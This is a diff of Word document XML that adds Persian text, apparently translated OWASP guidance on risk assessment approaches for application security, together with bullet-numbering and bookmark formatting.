+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> مورد استفاده قرار م</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> گ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>رند،</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> با</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>د</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> در ا</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ن</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> بخش افشا شود </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ا</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> به عنوان ضم</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>مه</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ذکر شده باشد. هنگام</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> که روش </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>متداول</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> مورد استفاده مشاوران قرار م</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> گ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>رد،</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> اغلب از مشتر</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> قدردان</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> م</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> شود. ا</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ن</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> به آنها </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ک</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ا</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ده</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> از دقت ارز</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>اب</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> و همچن</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ن</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ک</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ا</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ده</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> که در آن مناطق گنجانده شده است.</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -21597,6 +25433,119 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="394964D1"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="CDFCCA3E"/>
+    <w:lvl w:ilvl="0" w:tplc="04090001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="73F84F83"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="11C8A58A"/>
@@ -21713,6 +25662,9 @@
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="2">
+    <w:abstractNumId w:val="2"/>
+  </w:num>
+  <w:num w:numId="3">
     <w:abstractNumId w:val="1"/>
   </w:num>
 </w:numbering>

--- a/P325_345.docx
+++ b/P325_345.docx
@@ -314,6 +314,8 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -861,113 +863,113 @@
           <w:rtl/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
+        <w:t>رویکرد</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>رویکرد های زیادی برای ارزیابی خطر وجود دارد. قسمت منابع در پایین،  تعدادی از رایج ترین آنهارا ببینید.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">رویکرد </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">OWASP </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> نشان داده شده در اینجا بر اساس متودولوژی استاندارد است و برای امنیت اپلیکیشن ها سفارشی شده.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>رویکرد</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:bidi/>
-        <w:rPr>
